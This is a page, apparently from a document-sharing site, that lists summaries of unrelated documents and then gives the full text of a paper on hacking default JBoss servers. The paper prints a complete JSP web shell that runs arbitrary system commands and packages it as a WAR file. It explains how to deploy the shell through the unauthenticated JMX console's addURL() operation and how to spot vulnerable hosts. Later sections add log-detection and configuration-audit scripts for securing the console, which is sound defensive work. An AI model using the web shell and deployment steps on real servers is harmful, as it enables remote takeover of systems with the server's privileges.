This document describes how to hack a default JBoss installation using the JMX console by deploying a web application that executes system commands. It explains how to create a WAR file with a JSP that allows command execution, deploy it to JBoss by adding the URL to the DeploymentScanner, and then use the application to execute commands with the privileges of the JBoss server. It concludes by providing information on securing the JMX console to prevent this type of attack.
This document provides technical details and recommendations for securing a SLiMS integrated library system implementation. It discusses strategies for separating database access for public and staff users, restricting librarian login by IP address, enabling secure HTTPS connections, removing librarian login links from the public interface, using individual staff accounts, hardening the web server, database and operating system, and using PHP accelerators for performance. Implementation examples are also provided for production environments at government organizations.
ASP.NET 4.0 includes several new features such as output caching extensibility, auto-start web applications, session state compression, routing, and the Chart control. It also includes enhancements to caching, browser capabilities, and project templates. The Dynamic Data feature allows quickly building data-driven websites with automatic validation based on the data model.
This document proposes a technique to prevent XSS attacks by modifying how browsers render <script> tags inserted into the <body> of an HTML document. The technique involves the web server transforming the page generated by the application server by wrapping the <body> contents in a <script> tag. This causes any <script> tags in the original <body> to not execute while preserving those in the <head>. The goal is to enable security without requiring input validation by web developers. A proof-of-concept implementation demonstrates how this modification disables injected malicious scripts.
This document provides an overview and demonstration of the Microsoft Web Platform tools: IIS Web Eco-System, Web Platform Installer (Web PI), and Web Deploy. The presentation covers the main components and features of each tool, how they work, and examples of common usage scenarios. Web PI simplifies installation of web software. Web Deploy enables deployment and synchronization of websites, applications, and databases between IIS servers. Usage scenarios demonstrated include synchronization, migration, packaging, and modifying sync behavior with rules.
The document provides instructions for installing Oracle Enterprise Manager Cloud Control 12c and configuring its components. Key steps include:
1. Installing the Oracle Management Server (OMS) and configuring its database connection and ports.
2. Installing agents on an Oracle SOA clustered domain and configuring auto-discovery and promotion of targets to managed state.
3. Installing the JVMD (JVM Diagnostics) manager to monitor JVMs, which requires resynchronizing agents, selecting the application performance agent, and configuring a managed server.
Windows PowerShell is a new command-line shell and scripting language built on .NET. It can be used to administer SharePoint by allowing execution of multiple commands at once using cmdlets, unlike Stsadm which only accepts one command at a time. Permissions are required to use PowerShell for SharePoint, including being a member of the SharePoint_Shell_Access role and the WSS_ADMIN_WPG local group. Common tasks that can be performed with PowerShell include deploying solutions, managing features, backup/restore of content databases, and other site collection and site management operations.
Making the secure communication between Server and Client with https protocol, by Armenuhi Abramyan
This document discusses how to configure Apache HTTP Server 2.2.14 to enable secure communication using HTTPS. It describes generating a private key and self-signed certificate for the server, configuring the Apache modules for SSL and rewrite, and testing that web pages under the /b directory are only accessible via HTTPS and redirect HTTP requests to HTTPS.
The document outlines a series of laboratory exercises for configuring and using the Apache web server. It includes instructions for:
1) Setting up virtual machines and configuring networking to host Apache websites.
2) Installing and testing Apache, and familiarizing with its configuration file.
3) Configuring Apache as a secure reverse proxy and implementing basic security restrictions.
4) Adding user authentication, using .htaccess files, and virtual hosting with multiple sites.
5) Securing sites with SSL/TLS using self-signed and real certificates.
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert, by Chetan Soni
This document provides tips for securing a WordPress website. It lists 27 steps including disabling custom HTML, removing default posts and comments, deleting installation files, hiding indexes, blocking directories, securing the admin page, limiting login attempts, scanning for malware, creating custom secret keys, changing the database prefix, protecting configuration files, monitoring the site, hiding the login page, checking for content copying, scanning for exploits, using email as the login key, keeping logs of errors, activating the Akismet plugin, using maintenance mode, restricting admin access by IP, banning users, preventing access to folders, protecting individual files, disabling hotlinking, stopping spam, and optimizing the database. The document recommends using various WordPress security plugins and provides
Wamp & LAMP - Installation and Configuration, by Chetan Soni
This document provides instructions for installing and configuring WAMP (Windows, Apache, MySQL, PHP) and LAMP (Linux, Apache, MySQL, PHP) servers on Windows and Linux respectively. For the WAMP installation, it describes downloading and installing Apache, PHP, MySQL, and configuring them to work together. It then tests the installation with sample PHP files. For the LAMP installation, it describes initial steps like installing gcc and logging in as root before explaining how to install Apache, PHP and MySQL from source code.
This document provides instructions for installing SwiftConfigurator software. It outlines requirements for the operating system, database, application server, and browser. It describes how to configure the Oracle 11g database and Application Server 10g. Steps are provided for deploying the SwiftConfigurator application and configuring datasources. Additional setup information is also included for language settings and known issues.
This document discusses Android storage and Opaque Binary Blobs (OBBs). It defines StorageManager as the interface for storage-related items like OBBs. OBBs allow large binary assets to be stored outside an APK and mounted on demand. The document outlines how to create an encrypted OBB file using mkobb.sh, change its owner, sign it with obbtool, and include it in an OBB-enabled APK to securely provide additional app resources like large files.
This document provides a guide to configuring the Apache web server. It begins with basic setup instructions, covering verifying the installation, editing configuration files, creating HTML documents, starting the server, and accessing the website locally and externally. It then covers more advanced topics like using directory, files, and location tags; redirecting URLs; setting up virtual hosts; loading modules; using .htaccess files; and securing the server with encrypted sessions and SSL/TLS certificates. The document is intended to help new Linux and Windows users become proficient with Apache.
The document discusses configuring JBoss to work behind a firewall by modifying socket-based services that open listening ports. It lists several key JBoss services that open ports by default, including the naming service on port 1098, invoker services on ports 4444 and 4445, and others. It provides the configuration files and attributes to modify ports for each service.
This document is a user manual for an address book application. It provides instructions on installing the application, setting up users and permissions, integrating additional features like synchronization with email/mobile devices, customizing the look and feel, upgrading to new versions, and managing addresses within the system through the web interface, mobile apps, or email. The key sections cover quick or manual installation, configuring user accounts and permissions, integrating with services like Google/Facebook, and accessing and managing address entries.
This document provides instructions for setting up a highly available SharePoint farm in Windows Azure using SQL Server AlwaysOn availability groups. It describes how to configure Azure components like virtual networks and machines, set up an Active Directory domain, install and configure SharePoint and SQL Server, and create an AlwaysOn availability group across multiple SQL Server instances to provide database redundancy. The farm is designed across availability sets and fault domains in Azure to ensure high availability of the SharePoint and SQL resources in the cloud.
( 16 ) Office 2007 Create An Extranet Site With Forms Authentication, by LiquidHub
The document provides instructions for creating an extranet site that uses Forms Authentication in SharePoint. The steps include:
1) Creating an IIS web application and site collection for the extranet site.
2) Modifying the web.config files for the extranet site and Central Administration site to connect to the ASP.NET membership database.
3) Configuring authentication for the extranet site to use Forms Authentication and adding the first administrator user.
Lab 1: Introduction to Amazon EC2 and MPI, by Zubair Nabi
The document introduces Amazon EC2, MPI, and provides an example MPI "Hello World" program. It describes how EC2 allows users to rent virtual machines from a variety of configurations. It also explains basic MPI concepts like point-to-point communication and collective operations for exchanging data between processes.
This document provides instructions for backing up and restoring SMS messages from the GO SMS app using various storage options like local storage, cloud storage, and Dropbox. It also describes how to decrypt common SMS messages, which are stored in an XML file, and private SMS messages, which are stored in the app's SQLite database file. The private messages can be decrypted by running a Python script on the database file or by exporting the data from the database into a CSV file using SQLite browser software.
This webcast covers the theoretical introduction to Web Farms and how to build Drupal Web Farms with IIS. Don't miss the second part of the webcast (also part of this series) where a full demo on creating Drupal Web Farms with 4 virtual machines will be presented. If you are already familiar with Web Farms, Application Request Router, Web Farm Framework you can skip to part 2. Otherwise, this webcast is highly recommended and propaedeutic to grasp all the basic knowledge that you might need later.
AzMan is the authorization manager that controls role-based access in Hyper-V. It uses role definitions and assignments to determine which tasks and operations each user role is allowed to perform. AzMan can be used to securely configure access at the hypervisor or individual VM level. It is configured through the Azman.msc interface by creating roles, tasks, and assigning users and groups to roles. When a Hyper-V host joins a domain or is managed by VMM, AzMan permissions may be overwritten and default to provide full access to domain admins or VMM administrators.
A general performance settings monitoring plugin on the RavenDB database. It uses system commands to obtain the general performance settings for the database. For more information visit the following webpage: http://pandorafms.com/index.php?sec=Library&sec2=repository&lng=es&action=view_PUI&id_PUI=606
ASP.NET websites can be vulnerable to attacks like file inclusion and remote code execution if they do not properly sanitize user-supplied input, as features like Response.WriteFile and Server.Execute could allow an attacker to read arbitrary files or execute code if passed a malicious file path. The ViewState, Request Validation, and Event Validation features also have weaknesses that could allow attacks like cross-site scripting or request forgery if not implemented correctly.
This document discusses copyright and permissions related to the publication. It notes that no part of the publication may be reproduced without permission, except for certain fair use cases allowed under US copyright law. It also states that the information is intended to be accurate but does not provide licensing or guarantees regarding any third party content. Finally, it provides publishing details such as the publisher, date, and graphic artist used.
The document discusses security constraints for the Java EE platform. It provides an example of a security constraint configuration for the Java EE web application deployment descriptor that limits access to the "/admin/" URL pattern only to users with the "admin" role. The example uses the <security-constraint> element of the web deployment descriptor to specify this configuration.
This document summarizes Andrew van der Stock's presentation on Ajax security at the 2006 OWASP AppSec Europe conference. The presentation covered many security issues introduced by Ajax applications, including lack of privacy due to JavaScript being sent in cleartext, session fixation, injection attacks, improper access control, and the need to properly handle errors and audit client-side actions. It emphasized that Ajax applications must use the same authorization and validation techniques as traditional web apps to prevent attacks.
This document discusses SQL injection vulnerabilities in web applications. It begins by providing an overview and background on web applications and SQL. It then discusses comprehensively testing applications for SQL injection vulnerabilities and evaluating the results. The main section describes various SQL injection attack techniques, including authorization bypass, SELECT queries, INSERT statements, and exploiting stored procedures. It concludes by offering solutions for preventing SQL injection through data sanitization and secure coding practices.
This document provides guidelines for integrating the CommWeb Virtual Payment Client (VPC) to enable online payment processing. It outlines the VPC API and how to use VPC functionality to perform payment transactions and optional administration functions. The intended audience is merchants and integrators. Key steps for merchants to enable online payments are to obtain an access code and secure hash secret from Commonwealth Bank, then integrate the VPC into their e-commerce application based on the guidance in this manual.
This document discusses security issues with Ajax web applications. It describes how Ajax applications have a larger attack surface than traditional web applications due to additional entry points. This exposes the application to risks like information leakage through revealing internal functions, as well as risks from cross-site scripting and repudiation of requests. The document recommends approaches to secure Ajax applications.
This document contains a list of 109 documents related to credit cards. The documents cover various topics about credit cards including how to use credit cards responsibly, reducing credit card debt, choosing the right credit card type, avoiding credit card fraud, and understanding credit card fees and interest rates.
The document provides an overview of JBoss Application Server, including its definition, architecture, advantages, installation, configuration, deployment, running applications, and undeployment. It discusses that JBoss is a widely used open source Java application server that allows deployment of Java applications and provides services like transaction processing and security. The document also provides details on installing JBoss, using the management console, deploying applications as WAR files using Ant build scripts, and modifying or removing deployed applications.
This document provides instructions for getting started with JBoss ESB, including downloading and installing JBoss ESB, deploying it to the JBoss Application Server or JBoss ESB Server, and running a "Hello World" quickstart example to validate the installation. Key steps include downloading JBoss ESB and either the JBoss Application Server or JBoss ESB Server, configuring deployment properties, deploying JBoss ESB archives using Ant, and running the quickstart to test the integration.
This document provides instructions for getting started with JBoss ESB, including downloading and installing JBoss ESB, deploying it to the JBoss Application Server or JBoss ESB Server, and running a "Hello World" quickstart example to validate the installation. Key steps include downloading JBoss ESB and either the JBoss Application Server or JBoss ESB Server, configuring deployment properties, deploying JBoss ESB archives using Ant, and starting the server.
The slides from my Deployment Tactics talk at the ThinkVitamin Code Management online conference (http://thinkvitamin.com/online-conferences/code-manage-deploy/).
Drupal Continuous Integration with Jenkins - Deploy, by John Smith
This document describes setting up Jenkins jobs to automate deploying code from a Git repository to different environments. It includes:
1. Creating a simple job that deploys code to a single server/environment using a deployment script.
2. Creating a generic job that deploys code to multiple servers/environments using parameters for the repository, branch, and environment.
3. A sample deployment script that would run on servers to check out the appropriate code from Git based on the job parameters.
OFM SOA Suite 11gR1 – Installation Demonstration, by Sreenivasa Setty
Complete step-by-step installation instructions with screen captures to install and configure WebLogic Server and SOA Suite 11g R1.
This document is a fine extract of various installation documents, along with installation planning notes, and post installation verification points.
The document summarizes several key Java EE services including resource management, Java Naming and Directory Service (JNDS), security services, and transaction services. Resource management is implemented using resource pooling and activation/deactivation. Security services provide declarative security using roles and securing both EJBs and web components requires defining a security domain, login/error pages, and security declarations in deployment descriptors. Transactions services allow distributed transactions across multiple resources.
This document provides information on various tools used to develop mobile applications using HTML5, CSS, and JavaScript including Node.js, Git, Bower, PhoneGap, Cordova, ngCordova, and Angular Material Design. It also provides instructions on setting proxies for Node.js, Git, and Bower as well as steps for creating a mobile app with PhoneGap and Cordova.
This document discusses Protractor, an end-to-end testing framework for AngularJS applications. It explains what Protractor is, why it is needed for testing AngularJS apps, and how to install and use it. Key points include: Protractor combines Selenium to test AngularJS apps; it allows testing of app functionality rather than just unit tests; installation involves Node.js, Selenium WebDriver, and setting up a configuration file and spec file to define tests. An example test is provided to demonstrate entering text into a field and validating the output.
PVS-Studio: analyzing pull requests in Azure DevOps using self-hosted agentsAndrey Karpov
Static code analysis is most effective when changing a project, as errors are always more difficult to fix in the future than at an early stage. We continue expanding the options for using PVS-Studio in continuous development systems. This time, we'll show you how to configure pull request analysis using self-hosted agents in Microsoft Azure DevOps, using the example of the Minetest game.
Deploying configurable frontend web application containersJosé Moreira
Deploying containerized client-side web applications requires a different configuration strategy compared to system applications. The runtime of client-side web applications is the client-side web browser and, unlike other applications which can utilize environment values, configuration has to be hard-coded in the Javascript source code.
Setting up the hyperledger composer in ubuntukesavan N B
The document provides steps to set up Hyperledger Composer in Ubuntu by:
1. Installing development tools like composer-cli, generator-hyperledger-composer, and composer-rest-server.
2. Starting Hyperledger Fabric.
3. Creating a business network definition from a sample, modifying files, and defining models and transactions.
4. Building a business network archive (.bna) file.
5. Deploying the .bna file to the running Hyperledger Fabric.
6. Generating a REST API using composer-rest-server to interact with the business network.
Presentation on how Meetup tackles web performance. Given on:
- Nov 17th, 2009 for the NY Web Performance Group (http://www.meetup.com/Web-Performance-NY/)
- Jan 26th, 2010 for NYC Tech Talks Meetup Group (http://www.meetup.com/NYC-Tech-Talks/)
1. Meetup discussed optimizing the performance of their event details page by externalizing scripts, moving scripts to the bottom of the page, reducing requests, lazy loading scripts, and using event delegation.
2. These changes reduced the page load time by 27% from 6.321 seconds to 4.643 seconds and reduced javascript requests by 50%.
3. Meetup also optimized static content serving by versioning, compressing, caching resources and using a CDN to improve performance further.
The document provides an introduction to JBoss Application Server, including its history, architecture, components, installation process, directory structure, and how to start and stop the server. It also discusses the JBoss Administration Console and JMX Console for managing and monitoring the application server.
Prizm Content Connect is a lightweight document viewer flash control that allows applications to display and interact with different file formats like Microsoft Office documents. It provides a universal viewing solution and acts as a document container for embedding documents in a custom form or webpage. The viewer is lightweight, flexible and allows integrating an end-to-end solution using Office or other native format documents in a custom solution.
Story about module management with angular.jsDavid Amend
Angular.js angular some thoughs and learnings about module management. some ideas about usefulness of amd and alternatives up to async loading of content and execution
Speakers:
Johannes Weber
David Amend
Silicon Valley CodeCamp 2008: High performance Ajax with ExtJS and ASP.NETMats Bryntse
This document provides an overview and introduction to using ExtJS with ASP.NET for building high performance AJAX applications. It covers setting up Visual Studio for JavaScript development, debugging techniques, an introduction to ExtJS, examples of ExtJS components like grids and form panels, handling errors, and tips for optimizing AJAX performance.
"Hidden difficulties of debugger implementation for .NET WASM apps", Andrii R...Fwdays
Debug infrastructure implementation for .NET (Blazor) WebAssembly apps is challenging due to its unique execution environment. In this talk, we will dive deep into the hidden difficulties of debugger IDE frontend implementation for .NET WASM apps.
We'll start with an overview of Blazor WASM app execution anatomy, reviewing Debug Proxy in prticular. We will then compare regular .NET debugging with Blazor debugging and introduce Rider Debugging Infrastructure. Next, we'll discuss the steps involved in debug session initialization, including how the CDP (Chrome DevTools Protocol) is used. We will cover breakpoints, evaluation and explore multiple console views orchestration. Finally, we will discuss a few words about hot-reload, how it works and how it is supported from the IDE side.
This talk is essential for .NET developers working with Blazor WASM and anyone interested in understanding the complexities of debugging .NET WASM applications.
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitJongWon Kim
The document discusses penetration testing of the Easy RM to MP3 Converter application. It begins by setting up the testing environment with Backtrack5, Windows SP2 and SP3 virtual machines, and the vulnerable application. It then analyzes the application dynamically using a debugger to find a buffer overflow vulnerability. The document creates an exploit payload that uses return oriented programming (ROP) to bypass data execution prevention (DEP) and execute shellcode to connect back to the attacker machine for post-exploit access.
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Jboss Exploit
Hacking jBoss
Hacking a default jBoss installation using a browser
Jörg Scheinert
joerg.scheinert@nruns.com
IT Security Consultant, n.runs AG
n.runs AG is a vendor-independent consulting company specializing in the areas of: IT Infrastructure, IT Security, IT Business Consulting and IT Applications. For additional information visit the n.runs AG website at www.nruns.com.
Table of Contents
1. Introduction ... 3
2. Jboss ... 3
2.1. Default installation ... 3
2.2. JMX Console ... 3
3. Deploy a web application ... 4
3.1. The web application ... 4
3.2. Deploy it ... 5
4. Execute your code (hacker view) ... 6
5. Secure the JMX Console (administrator view) ... 6
Page 2 of 6 28.02.2008 n.runs AG
1. Introduction
This paper is a brief how-to on hacking a default Jboss installation using the JMX-Console.
2. Jboss
Jboss is an open source, standards-compliant application server which is based on J2EE (Java 2 Enterprise Edition). Being a Java-based application, it is generally platform-independent.
2.1. Default installation
The default configuration of Jboss is relatively open and thereby gives the administrator, as well as hackers, many ways to compromise it.
2.2. JMX Console [1]
The JMX console can be remotely accessed on port 8080 in the default configuration. The JMX console provides a view into the microkernel of the Jboss application server, as well as access to the MBeans of the application server. The JMX console can be used to configure the MBeans of the Jboss server. By default the JMX console on http://[host]:8080/jmx-console can be accessed without any authentication.
[1] http://en.wikipedia.org/wiki/JMX
3. Deploy a web application
In order to deploy new applications on the application server, it is only necessary to configure the DeploymentScanner [2] by adding a new URL with a customized WAR (Web ARchive) file. The DeploymentScanner regularly checks the configured URLs for new applications to deploy. By default it only checks the URL file:/[JBOSSHOME]/server/default/deploy/, but with the addURL() command, it is possible to add a new URL with an application. Jboss will get the application from this URL. The next step is to wait for the DeploymentScanner to run the next time (usually about one minute), and access the new application.
3.1. The web application
It is necessary to create a WAR file containing a WEB-INF directory and a JSP that executes system commands. Here is a short example:
$ echo 'The JSP to execute the commands'
$ cat > cmd.jsp <<'EOF'
<%@ page import="java.util.*,java.io.*"%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
  <INPUT TYPE="text" NAME="cmd">
  <INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
  if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
      out.println(disr);
      disr = dis.readLine();
    }
  }
%>
</pre>
</BODY></HTML>
EOF
$ echo 'The web.xml file in the WEB-INF directory configures the web application'
$ mkdir WEB-INF
$ cat > WEB-INF/web.xml <<'EOF'
<?xml version="1.0" ?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
                             http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
         version="2.4">
  <servlet>
    <servlet-name>Command</servlet-name>
    <jsp-file>/cmd.jsp</jsp-file>
  </servlet>
</web-app>
EOF
$ echo 'Now put it into the WAR file'
$ jar cvf cmd.war WEB-INF cmd.jsp
$ echo 'Copy it on a web server where the Jboss server can get it'
$ cp cmd.war /var/www/localhost/htdocs/
[2] http://wiki.jboss.org/wiki/Wiki.jsp?page=DeploymentScanner
More information can be found at:
WAR file: http://en.wikipedia.org/wiki/Sun_WAR_%28file_format%29
Creating a WAR file: http://access1.sun.com/techarticles/simple.WAR.html
JSP: http://en.wikipedia.org/wiki/JavaServer_Pages
3.2. Deploy it
1. Navigate the browser to the jboss.deployment:flavor=URL,type=DeploymentScanner MBean (http://[host]:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL)
2. Add the URL of the customized WAR file with the addURL() command
   (screenshot: Invoke)
   (screenshot: Success)
3. Wait for the DeploymentScanner....
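The deployment sequence above (inspecting the URL DeploymentScanner MBean, invoking addURL(), waiting for the next scan) goes through the HtmlAdaptor servlet and therefore shows up in the web server's access log, if one is written. The following Python script is an added example and is not part of this paper: it flags JMX console requests from hosts outside an administrator allow-list, requests to the console that were served rather than rejected, and requests that reference the URL DeploymentScanner MBean. It assumes the Tomcat AccessLogValve is enabled in JBoss's server.xml with the "common" log pattern (it ships commented out in JBoss 4, so enabling it is part of the hardening); the log lines and the allow-list are constructed for illustration.

```python
"""Flag JMX-console activity in a JBoss (embedded Tomcat) access log.

Added example, not from the n.runs paper. Assumes the "common" access-log
pattern: ip ident user [timestamp] "METHOD path proto" status bytes.
The sample lines and the admin allow-list are constructed, not real traffic.
"""
import re
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)')

# Hosts that are allowed to use the JMX console (assumed allow-list).
ADMIN_SOURCES = {"127.0.0.1", "10.0.0.5"}


def classify(line):
    """Return a dict describing why the line is suspicious, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # The MBean name is URL-encoded in GET requests; decode before matching.
    path = unquote(m["path"])
    if not path.startswith("/jmx-console"):
        return None
    reasons = []
    trusted = m["ip"] in ADMIN_SOURCES
    # Both orderings of the ObjectName keys occur, so match the two keys.
    scanner = "DeploymentScanner" in path and "flavor=URL" in path
    if not trusted:
        reasons.append("jmx-console request from non-admin source")
        if m["status"].startswith("2"):
            reasons.append("served with %s instead of rejected: console "
                           "reachable without authentication" % m["status"])
    # invokeOp is normally a POST whose form fields are not logged, so this
    # query-string match is best-effort; GET invocations appear in full.
    if scanner and "action=invokeOp" in path:
        reasons.append("operation invoked on URL DeploymentScanner "
                       "(addURL-style deployment)")
    elif scanner and not trusted:
        reasons.append("URL DeploymentScanner MBean inspected")
    if not reasons:
        return None
    return {"ip": m["ip"], "ts": m["ts"], "method": m["method"],
            "path": path, "status": m["status"], "reasons": reasons}


def scan(lines):
    """Classify every line and return only the alerts."""
    return [a for a in (classify(line) for line in lines) if a]


# Constructed sample log (RFC 5737 documentation addresses, not real hosts).
SAMPLE_LOG = [
    # admin browsing the console from an allowed host: no alert
    '10.0.0.5 - - [28/Feb/2008:10:00:01 +0100] "GET /jmx-console/ HTTP/1.1" 200 3125',
    # ordinary traffic: no alert
    '198.51.100.4 - - [28/Feb/2008:10:00:02 +0100] "GET /index.html HTTP/1.1" 200 1024',
    # outside host inspecting the URL DeploymentScanner and getting a 200
    '203.0.113.7 - - [28/Feb/2008:10:01:00 +0100] "GET /jmx-console/HtmlAdaptor'
    '?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL'
    ' HTTP/1.1" 200 14002',
    # outside host invoking an operation on it, rejected because auth is enabled
    '203.0.113.7 - - [28/Feb/2008:10:01:30 +0100] "GET /jmx-console/HtmlAdaptor'
    '?action=invokeOp&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL'
    ' HTTP/1.1" 401 1293',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["ip"], alert["status"], alert["path"])
        for r in alert["reasons"]:
            print("   -", r)
```

Because the operation invocation is a POST whose parameters never reach the access log, the reliable signal is the source address and the response status: any 2xx answer to a /jmx-console request from a host outside the allow-list means the console is reachable without authentication, regardless of what was invoked. A new deployment appearing in the server log shortly after such a request is the corroborating event.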
4. Access the deployed application
4. Execute your code (hacker view)
What needs to be deployed in order to execute the desired commands on the Jboss server? To access an application with the browser, a web application should be deployed. For example, put a command JSP (the cmd.jsp above) into the WAR file and upload it to the web server. Once the WAR file has been picked up by the DeploymentScanner, commands can be executed through the JSP. These commands will be executed with the privileges of the Jboss server.
4.1. Identifying vulnerable systems
Identifying vulnerable systems is easy, just check for the page
http://[host]:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL
and the string "addURL()".
5. Secure the JMX Console (administrator view)
http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureTheJmxConsole
http://jira.jboss.com/jira/secure/attachment/12313981/index.html
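The fix the two pages above describe is to enable the security-constraint in jmx-console.war/WEB-INF/web.xml and to bind the web application to a security domain in WEB-INF/jboss-web.xml, so that the HtmlAdaptor requires a login. The following Python script is an added example (not from this paper or the JBoss project) that audits those two descriptors: it reports a web.xml without a constraint on /*, without an auth-constraint, login-config or security-role, and a jboss-web.xml without a security-domain. It also flags a constraint that lists http-method elements, because the servlet specification applies such a constraint only to the listed verbs and leaves every other verb unauthenticated; the constraint should name no methods at all. The role name JBossAdmin and the domain java:/jaas/jmx-console follow the standard JBoss setup, and the sample descriptors are constructed for illustration.

```python
"""Audit jmx-console web.xml / jboss-web.xml for the settings that require a
login on the JMX console. Added example, not part of the n.runs paper.
The descriptors at the bottom are constructed samples.
"""
import xml.etree.ElementTree as ET


def _local(tag):
    """Strip the namespace: '{http://java.sun.com/xml/ns/j2ee}web-app' -> 'web-app'."""
    return tag.rsplit("}", 1)[-1]


def _kids(elem, name):
    return [c for c in elem if _local(c.tag) == name]


def _texts(elem, name):
    return [c.text.strip() for c in _kids(elem, name) if c.text]


def audit_web_xml(xml_text):
    """Return a list of findings for web.xml; an empty list means no issues."""
    root = ET.fromstring(xml_text)
    findings = []
    protects_all = False
    for sc in _kids(root, "security-constraint"):
        for wrc in _kids(sc, "web-resource-collection"):
            if "/*" not in _texts(wrc, "url-pattern"):
                continue
            protects_all = True
            # Listing verbs restricts the constraint to those verbs only; every
            # other verb stays unauthenticated, so the list must be empty.
            methods = _texts(wrc, "http-method")
            if methods:
                findings.append("constraint on /* only covers %s; remove the "
                                "<http-method> elements" % ", ".join(methods))
        if not _kids(sc, "auth-constraint"):
            findings.append("security-constraint has no <auth-constraint>: "
                            "it restricts nobody")
    if not protects_all:
        findings.append("no security-constraint with url-pattern /*: "
                        "console reachable without authentication")
    if not _kids(root, "login-config"):
        findings.append("no <login-config>: no authentication method configured")
    if not _kids(root, "security-role"):
        findings.append("no <security-role> declared")
    return findings


def audit_jboss_web_xml(xml_text):
    """Return findings for jboss-web.xml, the JBoss-specific descriptor."""
    root = ET.fromstring(xml_text)
    if not _texts(root, "security-domain"):
        return ["jboss-web.xml has no <security-domain>: the constraint is "
                "not bound to a login module"]
    return []


# Constructed: resembles the shipped descriptor, constraint commented out.
DEFAULT_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4">
  <!-- security-constraint / login-config / security-role left commented out -->
</web-app>
"""

# Constructed: constraint on /*, no verb list, BASIC login, role JBossAdmin.
HARDENED_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4">
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <role-name>JBossAdmin</role-name>
    </auth-constraint>
  </security-constraint>
  <login-config>
    <auth-method>BASIC</auth-method>
    <realm-name>JBoss JMX Console</realm-name>
  </login-config>
  <security-role>
    <role-name>JBossAdmin</role-name>
  </security-role>
</web-app>
"""

# Constructed: same constraint limited to GET and POST (other verbs bypass it).
GET_POST_ONLY_WEB_XML = HARDENED_WEB_XML.replace(
    "</url-pattern>",
    "</url-pattern>\n      <http-method>GET</http-method>"
    "\n      <http-method>POST</http-method>")

HARDENED_JBOSS_WEB_XML = """<jboss-web>
  <security-domain>java:/jaas/jmx-console</security-domain>
</jboss-web>
"""

if __name__ == "__main__":
    for label, text in [("default", DEFAULT_WEB_XML), ("hardened", HARDENED_WEB_XML),
                        ("get/post only", GET_POST_ONLY_WEB_XML)]:
        print(label, audit_web_xml(text) or "OK")
    print("jboss-web.xml", audit_jboss_web_xml(HARDENED_JBOSS_WEB_XML) or "OK")
```

To run it against a real server, read the two files from server/default/deploy/jmx-console.war/WEB-INF/ and pass their contents to the two functions. A clean result still needs the jmx-console security domain in conf/login-config.xml to point at a users file with a non-default password; the descriptors only tell the container to ask for a login, they do not decide who gets one.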
n.runs AG is a vendor-independent consulting company specializing in the areas of: IT Infrastructure,
IT Security, IT Business Consulting and IT Applications. Founded in 2001, n.runs specializes in
helping its customers to solve their information technology problems proactively and reactively. n.runs
delivers services in the areas of network design planning and implementation consulting, technical
security consulting such as secure design, application auditing, development of customized security
solutions, information security management consulting and specialized application products. Based in
Oberursel and Berlin, Germany, n.runs offers its knowledge and expertise to clients all over the world.
For additional information visit the n.runs AG website at www.nruns.com.